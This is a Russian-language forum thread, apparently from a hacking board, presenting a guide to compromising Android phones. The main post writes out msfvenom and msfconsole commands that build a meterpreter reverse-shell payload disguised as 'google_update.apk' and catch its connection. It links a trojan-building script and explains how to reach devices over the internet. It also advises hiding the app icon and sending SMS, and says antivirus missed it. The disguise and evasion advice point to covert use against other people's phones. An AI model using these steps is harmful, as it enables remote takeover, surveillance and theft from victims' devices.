Идея Авторская статья - Взлом смартфона на Android

Тема в разделе "Андроид / Android", создана пользователем yarr, 18 окт 2017.

  1. yarr

    yarr

    Сообщения:
    323
    Баллы:
    18
    UPD. Вспомнил про конкурс. Ув. @NightWos просьба выдать VC.
  2. mutilate

    mutilate

    Сообщения:
    193
    Баллы:
    16
    с такими хорошими авторскими темами ты выиграешь конкурс! Удачи!
  3. yarr

    yarr

    Сообщения:
    323
    Баллы:
    18
    Спасибо)
  4. yarr

    yarr

    Сообщения:
    323
    Баллы:
    18
    Скрытый контент. Для просмотра информации необходимо 100 репутации.
    Нажмите, чтобы раскрыть...​
  5. yarr

    yarr

    Сообщения:
    323
    Баллы:
    18
    Вcтупление.
    # cd/sdcard
    # msfvenom -p android/meterpreter/reverce_tcp lhost=192.168.1.45 lport=443 R > google_update.apk
    # msfconsole
    # use exploit/multi/handler
    # set payload android/meterpreter/reverse_tcp
    # set lhost 192.168.1.45
    # set lport 443
    # exploit
    meterpreter >

    Мануал предназначен для продвинутых пользователей, интересующихся мобильным пентестом и установкой кастомных прошивок. Это означает, что некоторые очевидные моменты я буду опускать. Cайты на которых есть подробности - 4pda, xda-developers, kali.org.

    Ссылки в рамках данного мануала не являются рекламой.



    Но не все так просто. Не зря выше я написал про "примерно" и "определенные условия". Я часто читаю комментарии под видео на YouTube от кретинов: "Автор мудак, ничего не объясняет, просто пишет команды в консоли". А вы думали вас еще бесплатно кто-то учить с 0 будет? Это вам не школа, сука. Нету никакой кнопки "ВЫСЛЕДИТЬ ПО IP И ВЗЛОМАТЬ"
    Честно говоря есть еще один путь - собрать троян самостоятельно
    1
    Для начала ставим зависимости,
    metasploit-framework, xterm, Zenity, Aapt, Apktool, Zipalign, (если apt-get install не находит пакет, пишем название с маленькой буквы)
    https://github.com/CorpOfHack/Evil-Droid-RU/
    1. запускаем скрипт: # ./evil-droid
    https://camo.githubusercontent.com/e12925f438900d70d5b5ae961a2c7a3eed0ef17f/68747470733a2f2f692e696d6775722e636f6d2f774372364859712e706e67



    [SIZE=5]Вопрос: "Как управлять устройством не из локальной сети, а из глобальной?[/SIZE]

    В качестве LHOST используйте свой публичный IP, payload необходимо выбрать reverse_https, LPORT=443, и пробросить порт на роутере 443 на локальный адрес Kali

    [SIZE=5][COLOR=#ffffff][SIZE=5][COLOR=#ffffff][SIZE=5][COLOR=#ffffff][FONT=Courier New][SIZE=5][COLOR=#ffffff]Напомню, что разрешения, которые запрашивает приложение при установке, могут вызвать подозрения у пользователя. Так же советую подробно изучить Android-опции в meterpreter (например hide_app_icon, send_sms) и поработать со скриптом из под NetHunter. По результатам моих тестов на реальном устройстве DrWeb и Avast ничего не заметили(я про активную защиту, что будет при сканировании не смотрел).[/COLOR][/SIZE][/FONT][/COLOR][/SIZE][/COLOR][/SIZE][/COLOR][/SIZE]


    [SIZE=5][COLOR=#ffffff][SIZE=5][COLOR=#ffffff][COLOR=#ffffff][FONT=Courier New][SIZE=5][COLOR=#ffffff][I]P.S. [I][I][I]Ввиду достаточного количества фото/видео материалов по данной теме(в основном на английском и др. иностранных языках) снимать свое видео/добавлять скриншоты не буду, все отлично гуглится. Кейсом занимаюсь лично сам, если есть вопросы пишите в личку/тему.[/I][/I][/I][/I][/COLOR][/SIZE][/FONT][/COLOR][/COLOR][/SIZE][/COLOR][/SIZE]

    [SIZE=5][COLOR=#ffffff][SIZE=5][COLOR=#ffffff][COLOR=#ffffff][FONT=Courier New][SIZE=5][COLOR=#ffffff][I]P.P.S. Обзор рассчитан на пользователей, только начинающих работать с MSF и прочими инструментами для тестирования на проникновение в качестве практического примера. Так что не надо срать по этому поводу в теме.[/I][/COLOR][/SIZE][/FONT][/COLOR][/COLOR][/SIZE][/COLOR][/SIZE]

Поделиться этой страницей

Top